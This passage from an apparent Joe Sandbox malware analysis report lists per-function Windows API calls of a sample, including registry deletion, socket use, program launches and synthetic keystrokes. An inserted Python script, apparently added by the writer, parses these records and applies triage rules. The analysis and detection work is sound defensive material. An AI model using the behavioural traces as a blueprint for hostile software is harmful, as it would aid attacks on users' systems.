                                                                          • Part of subcall function 00953C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00952BF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                        • String ID:
                                                                        • API String ID: 2595220575-0
                                                                        • Opcode ID: 37bade645dee2301731f8a850c2786050e367b2c1651c85b75d2e56976cf5414
                                                                        • Instruction ID: 1c57f32f4582cf049f8157f6ac2aa4af9d0661e36b015a7d075df0641ece7774
                                                                        • Opcode Fuzzy Hash: 37bade645dee2301731f8a850c2786050e367b2c1651c85b75d2e56976cf5414
                                                                        • Instruction Fuzzy Hash: F9916B752042059FCB00EF29C895B6EB7F5FF89311F04885DF9969B2A1DB34E949CB42
                                                                        APIs
                                                                        • select.WSOCK32 ref: 00949691
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0094969E
                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009496C8
                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009496E9
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009496F8
                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 009497AA
                                                                        • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0098DC00), ref: 00949765
                                                                          • Part of subcall function 0092D2FF: _strlen.LIBCMT ref: 0092D309
                                                                        • _strlen.LIBCMT ref: 00949800
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                        • String ID:
                                                                        • API String ID: 3480843537-0
                                                                        • Opcode ID: 2e4747f11d773d19684f35323f9957afee55b9ade5820a7bd6be05e2999ab6fa
                                                                        • Instruction ID: 6f465fd684f77919916732017d22934c8612558780480dc0557debaae6219cc8
                                                                        • Opcode Fuzzy Hash: 2e4747f11d773d19684f35323f9957afee55b9ade5820a7bd6be05e2999ab6fa
                                                                        • Instruction Fuzzy Hash: 02817B72504204AFC714EF68CC86F6BB7A9FFC5714F104A19F6559B2A1EB30E905CB92
                                                                        APIs
                                                                        • __mtinitlocknum.LIBCMT ref: 0091A991
                                                                          • Part of subcall function 00917D7C: __FF_MSGBANNER.LIBCMT ref: 00917D91
                                                                          • Part of subcall function 00917D7C: __NMSG_WRITE.LIBCMT ref: 00917D98
                                                                          • Part of subcall function 00917D7C: __malloc_crt.LIBCMT ref: 00917DB8
                                                                        • __lock.LIBCMT ref: 0091A9A4
                                                                        • __lock.LIBCMT ref: 0091A9F0
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,009A6DE0,00000018,00925E7B,?,00000000,00000109), ref: 0091AA0C
                                                                        • EnterCriticalSection.KERNEL32(8000000C,009A6DE0,00000018,00925E7B,?,00000000,00000109), ref: 0091AA29
                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 0091AA39
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1422805418-0
                                                                        • Opcode ID: eca1b74b3db2ef2d89ee9c6c2e7294771231be9357aa9448fb2fe9a68af023b5
                                                                        • Instruction ID: af3ab2aae6085c93c2b0351036593b2d26cc71ed715b588dfd92ae76c227cf74
                                                                        • Opcode Fuzzy Hash: eca1b74b3db2ef2d89ee9c6c2e7294771231be9357aa9448fb2fe9a68af023b5
                                                                        • Instruction Fuzzy Hash: D1412771B0620A9BEB209F68DA447DDB7B5AF41335F148318E569AB2D1D7749CC0CB82
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 00958EE4
                                                                        • GetDC.USER32(00000000), ref: 00958EEC
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00958EF7
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00958F03
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00958F3F
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00958F50
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0095BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00958F8A
                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00958FAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 3864802216-0
                                                                        • Opcode ID: b3377925385b83cdb496746ca465938b3c6b8434c6a8ad0038bde7e87cf65974
                                                                        • Instruction ID: cf025f0521e8dfba1609aaa8f1d6382ca77b116a77a8a84f59858cd43f175a18
                                                                        • Opcode Fuzzy Hash: b3377925385b83cdb496746ca465938b3c6b8434c6a8ad0038bde7e87cf65974
                                                                        • Instruction Fuzzy Hash: 49317F72215214BFEB109F51CC4AFEB3BADEF49716F044065FE08AA191C6759841DBB0
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                          • Part of subcall function 0090C6F4: _wcscpy.LIBCMT ref: 0090C717
                                                                        • _wcstok.LIBCMT ref: 0094184E
                                                                        • _wcscpy.LIBCMT ref: 009418DD
                                                                        • _memset.LIBCMT ref: 00941910
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                        • String ID: X
                                                                        • API String ID: 774024439-3081909835
                                                                        • Opcode ID: aa14848bf788f39d3b302d61e52209dd08b45a337e2dbfb5fc07c5f3757d89d3
                                                                        • Instruction ID: 02977b4f5ec8b5c307c543f233374e3c1edd63b6b3a11907bd21c6d4b9ee06b5
                                                                        • Opcode Fuzzy Hash: aa14848bf788f39d3b302d61e52209dd08b45a337e2dbfb5fc07c5f3757d89d3
                                                                        • Instruction Fuzzy Hash: B6C15C356043449FC724EF28C991E6AB7E4FF85354F10492DFA99972A2DB30ED85CB82
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0096016D
                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0096038D
                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009603AB
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009603D6
                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009603FF
                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00960421
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00960440
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                        • String ID:
                                                                        • API String ID: 3356174886-0
                                                                        • Opcode ID: 7adce413f8935e2ec2d07316f405c5a7ac2b20fbec9e4f81f2e3b46f2f52d166
                                                                        • Instruction ID: 7488ddae700e9784f2b03ef248f31df3ca22ac075d542d51bab9db201149ac18
                                                                        • Opcode Fuzzy Hash: 7adce413f8935e2ec2d07316f405c5a7ac2b20fbec9e4f81f2e3b46f2f52d166
                                                                        • Instruction Fuzzy Hash: 22A1BD35600616EFDB18CF68C9D9BBEBBB5FF88701F148115E858A7290E734AD50DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 680fc94101fac870d54a0215e5422cd724deba27067adadb1f58fefcd9075061
                                                                        • Instruction ID: c1d1f8b16adbba7e29175097dac8274cafadefd78c03d37767f0812ea4608b67
                                                                        • Opcode Fuzzy Hash: 680fc94101fac870d54a0215e5422cd724deba27067adadb1f58fefcd9075061
                                                                        • Instruction Fuzzy Hash: DC716F7190420AEFCB14CF98CC49EAEBB79FF85314F148549FA15AB291C734AA41CFA5
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0095225A
                                                                        • _memset.LIBCMT ref: 00952323
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00952368
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                          • Part of subcall function 0090C6F4: _wcscpy.LIBCMT ref: 0090C717
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0095242F
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0095243E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                        • String ID: @
                                                                        • API String ID: 4082843840-2766056989
                                                                        • Opcode ID: 915ee0554bf5b735bbc6c9fc3835a13617f0c8c5eceb5fe79b2cf194967829a2
                                                                        • Instruction ID: 6b21b2896e4875088698331cacd6daf4743bd8c32cbfb7764a6f6e6eb824f128
                                                                        • Opcode Fuzzy Hash: 915ee0554bf5b735bbc6c9fc3835a13617f0c8c5eceb5fe79b2cf194967829a2
                                                                        • Instruction Fuzzy Hash: 03718E75A006199FCF04EFA9C881AAEB7F5FF49310F108459E859AB391DB34AE44CB91
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 00933DE7
                                                                        • GetKeyboardState.USER32(?), ref: 00933DFC
                                                                        • SetKeyboardState.USER32(?), ref: 00933E5D
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00933E8B
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00933EAA
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00933EF0
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00933F13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: db42659f98bec252a5ca5fe918e496388c33d0f68f77a2dc82b08995150d619a
                                                                        • Instruction ID: a84916ffc4d6911f84e4bf270c8920be346e73567246ddd348b795d5b1069868
                                                                        • Opcode Fuzzy Hash: db42659f98bec252a5ca5fe918e496388c33d0f68f77a2dc82b08995150d619a
                                                                        • Instruction Fuzzy Hash: 9C51C3A0A987D53EFB3643648C46BB67EA95F06304F08C589F0D9468C2D398EEC4DB60
                                                                        APIs
                                                                        • GetParent.USER32(00000000), ref: 00933C02
                                                                        • GetKeyboardState.USER32(?), ref: 00933C17
                                                                        • SetKeyboardState.USER32(?), ref: 00933C78
                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00933CA4
                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00933CC1
                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00933D05
                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00933D26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: de8a0c79d7cf5e9109064aadbe4e908a15f528fc8ae591e12d7750c8e6e9b229
                                                                        • Instruction ID: 8eed85fedfb81babcbaed555f828cad005501a1784b2cf0ad37504b5c34ce3bc
                                                                        • Opcode Fuzzy Hash: de8a0c79d7cf5e9109064aadbe4e908a15f528fc8ae591e12d7750c8e6e9b229
                                                                        • Instruction Fuzzy Hash: A451F6A15887D53DFB3287748C46B76BFADAF06300F08C488E4D55A8C2D694EEC4EB60
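The two records above are the same routine once for WM_KEYDOWN (0x100) and once for WM_KEYUP (0x101), posted for VK_SHIFT (0x10), VK_CONTROL (0x11), VK_MENU (0x12) and VK_LWIN (0x5B) after reading and rewriting the keyboard state: the modifier-key reset that AutoIt's keystroke sending performs. Reading thousands of such records by hand does not scale, so here is an added triage example that parses this report's per-function record format and applies a few illustrative rules to it. It is my own code, not part of the Joe Sandbox report or its IDA plugin; the embedded sample is an abbreviated copy of three records from this section (the Memory Dump Source lines are dropped), the Win32 message and virtual-key constants are the standard ones named above, and the rule names and the API-name combinations they key on are my own assumptions, not Joe Sandbox signatures.

```python
"""Added example: parse Joe Sandbox per-function API records and run triage rules over them."""
import re
from dataclasses import dataclass, field

@dataclass
class ApiCall:
    name: str       # e.g. PostMessageW
    module: str     # e.g. USER32
    args: list      # argument tokens as printed; "?" where the sandbox could not resolve one
    ref: str        # call-site address
    subcall: bool   # reached through a called function rather than directly

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # "API ID", "Instruction Fuzzy Hash", ...

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR:" (the indented lines in the report).
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
RECORD_END = "Instruction Fuzzy Hash"   # last bullet of every record in the report

def parse_records(text):
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    m.group("ref"), bool(m.group("sub"))))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m.group("key")] = m.group("val")
            if m.group("key") == RECORD_END:
                records.append(cur)
                cur = FunctionRecord()
    return records

# Standard Win32 constants for the message and virtual-key codes seen in the records.
KEY_MSGS = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
MODIFIER_VKS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

def _hex(tok):
    try:
        return int(tok, 16)
    except ValueError:      # "?" placeholder for an unresolved argument
        return None

def synthesized_modifier_keys(rec):
    """PostMessageW(hwnd, WM_KEYDOWN|WM_KEYUP, VK_<modifier>, ...) calls in one function."""
    hits = []
    for c in rec.apis:
        if c.name == "PostMessageW" and len(c.args) >= 3:
            msg, vk = _hex(c.args[1]), _hex(c.args[2])
            if msg in KEY_MSGS and vk in MODIFIER_VKS:
                hits.append(f"{KEY_MSGS[msg]} {MODIFIER_VKS[vk]}")
    return hits

def triage(rec):
    """Illustrative rules (my own assumptions, not Joe Sandbox signatures)."""
    names = {c.name for c in rec.apis}
    findings = []
    keys = synthesized_modifier_keys(rec)
    if keys:
        findings.append("posts modifier key events to a window: " + ", ".join(keys))
    if {"RegEnumKeyExW", "RegDeleteKeyW"} <= names:
        findings.append("enumerates and deletes registry keys (recursive key delete)")
    if names & {"ShellExecuteExW", "ShellExecuteW", "CreateProcessW"}:
        findings.append("launches an external program")
    return findings

# Abbreviated copies of three records from this report section (Memory Dump Source lines dropped).
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00933C17
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00933CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00933CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00933D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00933D26
Similarity
• API ID: MessagePost$KeyboardState$Parent
• Instruction Fuzzy Hash: A451F6A15887D53DFB3287748C46B76BFADAF06300F08C488E4D55A8C2D694EEC4EB60
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00953DA1
  • Part of subcall function 00953D72: RegCloseKey.ADVAPI32(?), ref: 00953DE8
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00953E25
• Instruction Fuzzy Hash: 133129B2915109BFDB15DB91DC8AAFFB7BCEF09341F00416AE912E2150D6749F8C9BA0
APIs
• _memset.LIBCMT ref: 0095225A
• ShellExecuteExW.SHELL32(?), ref: 00952368
• Instruction Fuzzy Hash: 03718E75A006199FCF04EFA9C881AAEB7F5FF49310F108459E859AB391DB34AE44CB91
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("Instruction Fuzzy Hash", "")[:16], triage(rec))
```

Run it against the "Windows Analysis Report" text as extracted here (or the report's HTML converted to text) to list only the functions that trip a rule, keyed by their Instruction Fuzzy Hash so hits can be compared across samples. The rules are deliberately loose: the modifier-key pattern also matches the benign AutoIt runtime, so treat a hit as a pointer to the record, not as a verdict.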
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$LocalTime
                                                                        • String ID:
                                                                        • API String ID: 2945705084-0
                                                                        • Opcode ID: 4f14b181a9e24ca5051911dcfa30735b1d494a3b2ce10fa991581bb69ae2130b
                                                                        • Instruction ID: ef10111d879594d8016a77683528b0243bcc374e3eb161e338765dd32ac0d322
                                                                        • Opcode Fuzzy Hash: 4f14b181a9e24ca5051911dcfa30735b1d494a3b2ce10fa991581bb69ae2130b
                                                                        • Instruction Fuzzy Hash: 19419466E10218B6CB20EBF4CC46ACFB3ACAF84710F508966E518F3121F675D691CBE5
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00959FA3
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0095A04A
                                                                        • IsMenu.USER32(?), ref: 0095A062
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0095A0AA
                                                                        • DrawMenuBar.USER32 ref: 0095A0C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                        • String ID: 0
                                                                        • API String ID: 3866635326-4108050209
                                                                        • Opcode ID: 5cbb9ea10b9c8cce1d6d82793acfb2737f4001c6d2c559d876087f56cdc679db
                                                                        • Instruction ID: e9368ba20a142b51535564cec83dfc6f58eae3bc58b86380b5491fc1a7c5cd0b
                                                                        • Opcode Fuzzy Hash: 5cbb9ea10b9c8cce1d6d82793acfb2737f4001c6d2c559d876087f56cdc679db
                                                                        • Instruction Fuzzy Hash: E4417975A10208EFDB10CF61D894EAABBB8FF09325F048619FD1597290D335AD58DF61
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00953DA1
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00953DCB
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00953E80
                                                                          • Part of subcall function 00953D72: RegCloseKey.ADVAPI32(?), ref: 00953DE8
                                                                          • Part of subcall function 00953D72: FreeLibrary.KERNEL32(?), ref: 00953E3A
                                                                          • Part of subcall function 00953D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00953E5D
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00953E25
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 395352322-0
                                                                        • Opcode ID: 38608913f7489aedff141b1845becee785de4589372cf6e22cdf1c589b10c564
